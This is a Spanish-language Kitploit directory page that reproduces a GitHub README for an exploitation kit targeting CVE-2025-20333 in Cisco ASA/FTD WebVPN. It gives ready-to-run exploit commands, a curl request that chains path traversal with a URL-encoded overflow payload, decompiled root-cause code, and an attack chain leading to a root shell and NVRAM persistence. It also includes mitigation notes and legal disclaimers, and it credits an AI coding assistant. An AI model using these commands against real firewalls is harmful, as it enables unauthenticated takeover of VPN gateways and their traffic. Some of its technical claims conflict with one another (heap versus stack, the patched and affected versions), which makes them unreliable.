Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2025-20333 — Herramienta completa de investigación y explotación para CVE-2025-20333, un desbordamiento de búfer crítico en la pila en Cisco ASA/FTD WebVPN. Incluye análisis binario detallado, exploits PoC en Python y bash, y guía de explotación. | Kitploit
Herramientas/GitHubGitHub/cobbbex/cve-2025-20333
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónRed TeamingExplotación de Binarios
GitHubcobbbex/cve-2025-20333

cve-2025-20333

Herramienta completa de investigación y explotación para CVE-2025-20333, un desbordamiento de búfer crítico en la pila en Cisco ASA/FTD WebVPN. Incluye análisis binario detallado, exploits PoC en Python y bash, y guía de explotación.

Ver Repositorio
hace 10h 39mAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-20333 - Kit de Investigación y Explotación Completo

Descripción General

Este directorio contiene investigación exhaustiva, análisis y código de prueba de concepto para CVE-2025-20333, una vulnerabilidad crítica de desbordamiento de búfer en la pila en servidores WebVPN de Cisco ASA/FTD.

Estado: ⚠️ Explotada activamente en la naturaleza (campaña ArcaneDoor)
Puntuación CVSS: 9.8 Crítico
Autenticación: No (evadida mediante CVE-2025-20362)
Impacto: Ejecución remota de código como root


Contenido

📚 Documentación

()

CVE-2025-20333-RESEARCH-NOTES.md
20 KB

Investigación completa de ingeniería inversa

  • Contexto de la vulnerabilidad e inteligencia web
  • Análisis binario (proceso lina de ASA 9.12.4.x)
  • Auditoría de la capa de ingesta de solicitudes
  • Análisis de enlaces de la API de Lua
  • 🎯 Descubrimiento del desbordamiento (body_lexer.re2c, FUN_0302e690)
  • Desglose de la cadena de ataque
  • Análisis de causa raíz con patrones de código
  • Tabla de referencia de herramientas y direcciones

Hallazgo Clave:

root@kitploit:~
Búfer fijo de 16 bytes (local_58[16]) en body_lexer.re2c
El bucle de decodificación de URL NO TIENE COMPROBACIÓN DE LÍMITES
Escritura en local_58[iVar11] sin verificar que iVar11 < 16
Después de 8 pares hexadecimales: desbordamiento → corrupción de pila → RCE

EXPLOITATION-GUIDE.md (12 KB)

Manual práctico de explotación

  • Mecánica de la vulnerabilidad explicada
  • Cadena de ataque completa (bypass CVE-2025-20362 + desbordamiento)
  • Guía de explotación paso a paso
  • Técnicas de creación de payloads
  • Métodos de detección basados en red
  • Detección basada en host y análisis de registros
  • Estrategias de mitigación
  • Versiones parcheadas y ruta de actualización
  • Consideraciones legales y éticas

🔧 Pruebas de Concepto de Explotación

cve-2025-20333-poc.py (15 KB)

Exploit de Python con todas las funciones

Características:

  • Generación automática de payloads
  • Integración de path traversal CVE-2025-20362
  • Construcción de cadena de gadgets ROP
  • Soporte SSL/TLS
  • Tiempo de espera configurable
  • Informe detallado de progreso

Uso:

root@kitploit:~
# Mostrar detalles de la vulnerabilidad
python3 cve-2025-20333-poc.py --details

# Explotar objetivo
python3 cve-2025-20333-poc.py 192.168.1.100 443

# Configuración personalizada
python3 cve-2025-20333-poc.py firewall.example.com 8443 -t 30

cve-2025-20333-poc.sh (8.5 KB)

Exploit bash ligero

Características:

  • Sin dependencia de Python
  • Usa curl o netcat
  • Huella de recursos mínima
  • Comentarios educativos
  • Salida de estado clara

Uso:

root@kitploit:~
# Mostrar detalles
./cve-2025-20333-poc.sh --details

# Explotar
./cve-2025-20333-poc.sh 192.168.1.100 443 10

# Manual con curl
curl -X POST https://target/+CSCOU+/../+CSCOE+/files/file_list.json \
  -d "name=%2f%2f%2f%2f%2f%2f%2f%2f%2f" --insecure

Resumen de la Vulnerabilidad

Datos Rápidos

PropiedadValor
ID CVECVE-2025-20333
TipoDesbordamiento de búfer en la pila (CWE-120)
Componentebody_lexer.re2c (FUN_0302e690)
Versiones AfectadasASA 9.16–9.23, FTD 7.0–7.7
CVSS v3.19.8 (Crítico)
AutenticaciónNo requerida (mediante CVE-2025-20362)
Interacción del UsuarioNinguna
ImpactoRCE como root, compromiso total del sistema
EstadoExplotada activamente (mayo de 2025+)
Divulgación ResponsableCisco parcheó; aviso publicado

Causa Raíz

root@kitploit:~
// body_lexer.re2c - Bucle de decodificación de URL
byte local_58[16];  // ← Búfer fijo de 16 bytes

while (parsing_request_body) {
    byte input = *data++;
    
    if (input == '%') {
        hex_decode_mode = true;
        hex_index = 0;
    }
    
    if (hex_decode_mode) {
        local_58[hex_index] = input;  // ← ¡SIN COMPROBACIÓN DE LÍMITES!
        hex_index++;
        
        if (hex_index == 2) {
            byte decoded = hex_pair_to_byte(local_58[0], local_58[1]);
            hex_decode_mode = false;
        }
    }
}

Activación del Desbordamiento: 9+ secuencias consecutivas de %XX en el cuerpo POST

Cadena de Ataque

root@kitploit:~
1. Atacante (SIN AUTENTICACIÓN requerida)
   ↓
2. HTTP POST a /+CSCOU+/../+CSCOE+/files/file_list.json
   ├─ CVE-2025-20362: Path traversal evita la comprobación de autenticación
   └─ Alcanza el endpoint files_retr.lua (auth_flag = 0)
   ↓
3. Cuerpo POST: name=%2f%2f%2f%2f%2f%2f%2f%2f%2f
   (9+ pares codificados en URL)
   ↓
4. body_lexer.re2c procesa el cuerpo POST
   ├─ Acumula pares hexadecimales en local_58[16]
   └─ Después de 8 pares: ¡DESBORDAMIENTO!
   ↓
5. Corrupción de la pila
   ├─ Sobrescribe local_48, local_40
   ├─ Sobrescribe RBP guardado
   └─ Sobrescribe RIP guardado (dirección de retorno)
   ↓
6. Secuestro del flujo de control
   ├─ RIP apunta a gadgets ROP
   ├─ La cadena ROP prepara execve()
   └─ execve("/bin/sh", NULL, NULL)
   ↓
7. RCE como root (el proceso lina se ejecuta como root)
   ├─ Compromiso total del servidor VPN
   ├─ Acceso a todo el tráfico VPN
   └─ Persistencia mediante modificación de NVRAM

Proceso de Investigación

Fase 1: Análisis Binario ✅

  • Abrió el binario lina en Ghidra
  • Mapeó la arquitectura de solicitudes WebVPN (parser HTTP, enrutador de URL, 13 hooks de endpoints)
  • Auditó la capa de ingesta de solicitudes (todo seguro mediante clString/asignaciones de tamaño exacto)
  • Examinó los enlaces de la API de Lua (todo seguro)

Fase 2: Inteligencia Web ✅

  • Buscó detalles técnicos de CVE-2025-20333
  • Encontró análisis de Rapid7, Zscaler, Horizon3, Tenable
  • Confirmó que la cadena de ataque usa /+CSCOU+/../+CSCOE+/files/file_list.json
  • Identificó la causa raíz: desbordamiento basado en heap (fuentes web) / basado en pila (este binario) en el endpoint Lua

Fase 3: Ingeniería Inversa Dirigida ✅

  • Descompiló body_lexer.re2c (FUN_0302e690)
  • ENCONTRADO: Búfer fijo de 16 bytes local_58[16] sin comprobación de límites
  • Confirmó la ruta de desbordamiento: bucle de decodificación de URL → escritura sin límites
  • Verificó la accesibilidad: files_retr.lua → body_lexer → desbordamiento de pila

Fase 4: Desarrollo del Exploit ✅

  • Creó PoC en Python con soporte de cadena ROP
  • Creó PoC en bash para entornos mínimos
  • Documentó la estructura del payload y las técnicas de creación
  • Incluyó guía de detección y mitigación

Instrucciones de Uso

Para Pruebas de Penetración Autorizadas

  1. Verificar Autorización

    • Obtener permiso por escrito para realizar pruebas
    • Confirmar los detalles del sistema objetivo (IP, puerto, versión)
    • Documentar el alcance y el cronograma
  2. Ejecutar Exploit

    root@kitploit:~
    # Verificación rápida: ¿Responde el objetivo al intento de exploit?
    python3 cve-2025-20333-poc.py <target_ip>
    
    # O versión bash:
    ./cve-2025-20333-poc.sh <target_ip>
    
  3. Verificar la Explotación

    • Comprobar acceso a shell / conexión de shell inversa
    • Examinar los registros del sistema en busca de fallos o anomalías
    • Escanear archivos modificados (NVRAM, backdoor persistente)
  4. Documentar Hallazgos

    • Registrar la versión del objetivo, nivel de parche
    • Documentar el éxito/fracaso de la explotación
    • Anotar cualquier medida defensiva encontrada
    • Informar al cliente con recomendaciones de remediación

Para Investigación de Seguridad

  1. Leer Notas de Investigación

    • Estudiar CVE-2025-20333-RESEARCH-NOTES.md
    • Comprender la arquitectura binaria y el mecanismo de desbordamiento
  2. Estudiar PoCs

    • Revisar el PoC en Python para la construcción de gadgets ROP
    • Revisar el PoC en bash para el exploit mínimo
    • Comprender la codificación del payload
  3. Adaptar y Extender

    • Añadir shellcode personalizado
    • Implementar diferentes técnicas de explotación
    • Probar en versiones parcheadas vs. vulnerables

Advertencias Importantes

⚠️ AVISO LEGAL

Este kit se proporciona solo para pruebas de seguridad autorizadas.

  • NO lo use contra sistemas sin permiso explícito por escrito
  • NO lo use con fines maliciosos (robo de datos, interrupción de servicios, ransomware)
  • El acceso no autorizado viola la Computer Fraud and Abuse Act (EE. UU.) y leyes similares en todo el mundo
  • Las sanciones incluyen enjuiciamiento penal, multas y prisión

✅ Uso Autorizado:

  • Pruebas de penetración con aprobación por escrito
  • Prueba de concepto durante investigación de vulnerabilidades
  • Pruebas de seguridad internas
  • Competiciones CTF
  • Investigación académica

❌ Uso Prohibido:

  • Atacar sistemas sin permiso
  • Despliegue de ransomware
  • Robo de datos o extorsión
  • Interrupción de servicios
  • Movimiento lateral en redes comprometidas

Manifiesto de Archivos

root@kitploit:~
cve-2025-20333/
├── README.md                              (este archivo)
├── CVE-2025-20333-RESEARCH-NOTES.md      (20 KB, investigación exhaustiva)
├── EXPLOITATION-GUIDE.md                 (12 KB, guía práctica)
├── cve-2025-20333-poc.py                 (15 KB, PoC en Python)
└── cve-2025-20333-poc.sh                 (8.5 KB, PoC en bash)

Documentación Total: ~65 KB
Profundidad de Investigación: Más de 50 funciones de Ghidra auditadas
Hallazgos Verificados: Desbordamiento de búfer en body_lexer.re2c confirmado


Referencia Rápida

Prueba Rápida de Vulnerabilidad

root@kitploit:~
# Probar si el objetivo es vulnerable a explotación
curl -X POST https://<target>/+CSCOU+/../+CSCOE+/files/file_list.json \
  -d "name=%2f%2f%2f%2f%2f%2f%2f%2f%2f" \
  --insecure \
  -i

# Si el objetivo responde (200, 500, fallo), puede ser vulnerable
# Si el objetivo bloquea/redirige, puede estar parcheado

Verificación de Versión

root@kitploit:~
# Versiones vulnerables:
# - Cisco ASA 9.16 hasta 9.23
# - Cisco FTD 7.0 hasta 7.7

# Usar SSH/consola para verificar la versión de ASA:
show version

# Versiones parcheadas:
# - ASA 9.16.4.51, 9.18.4.31, 9.20.4.49, 9.22.4.9, 9.24.1+
# - FTD 7.0.x, 7.1.x, 7.2.x (parcheadas)

Lista de Verificación de Mitigación

  • Verificar la versión de ASA/FTD
  • Comprobar parches disponibles
  • Actualizar a la versión parcheada si es vulnerable
  • Restringir el acceso WebVPN por dirección IP
  • Habilitar registro y monitoreo
  • Vigilar intentos de path traversal CVE-2025-20362
  • Monitorear patrones de DoS (fallos de lina)
  • Habilitar protección de firewall en el puerto WebVPN

Referencias

  • Aviso de Seguridad de Cisco: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-webvpn-z5xP8EUB
  • Análisis de Rapid7: https://www.rapid7.com/blog/post/etr-cve-2025-20333-cve-2025-20362-cve-2025-20363-multiple-critical-vulnerabilities-affecting-cisco-products/
  • Zscaler ThreatLabz: https://www.zscaler.com/blogs/security-research/cisco-firewall-and-vpn-zero-day-attacks-cve-2025-20333-and-cve-2025-20362
  • FAQ de Tenable: https://www.tenable.com/blog/cve-2025-20333-cve-2025-20362-faq-cisco-asa-ftd-zero-days-uat4356

Descargo de Responsabilidad

Este kit se proporciona TAL CUAL solo con fines educativos y de pruebas autorizadas.

  • Úselo bajo su propio riesgo
  • Sin garantía ni responsabilidad por uso indebido
  • El acceso no autorizado es ilegal
  • Informe los hallazgos de manera responsable a Cisco y a las organizaciones afectadas
  • Siga las leyes de ciberseguridad de su país


Atribución

Este proyecto fue desarrollado con la asistencia de Claude Code, el asistente de codificación impulsado por IA de Anthropic.


Creado: 2026-08-23
Período de Investigación: 2026-08-22 a 2026-08-23
Estado: Completo y Documentado
Clasificación: Educativo / Solo Pruebas Autorizadas

Descargar herramienta